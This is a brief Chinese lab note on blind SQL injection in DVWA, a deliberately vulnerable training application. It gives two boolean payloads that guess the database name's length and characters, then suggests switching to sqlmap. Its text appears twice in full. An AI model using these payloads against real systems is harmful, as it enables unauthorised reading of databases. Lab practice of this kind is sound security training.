【DVWA】sql盲注...
sql盲注没有返回数据库内容,所以要猜。
先猜长度,再猜字符
1’and length(database())>1 #
1’ and ascii(substr(database(),1,1))>1 #
…好久好久
直接使用sqlmap来注入
sql盲注没有返回数据库内容,所以要猜。
先猜长度,再猜字符
1’and length(database())>1 #
1’ and ascii(substr(database(),1,1))>1 #
…好久好久
直接使用sqlmap来注入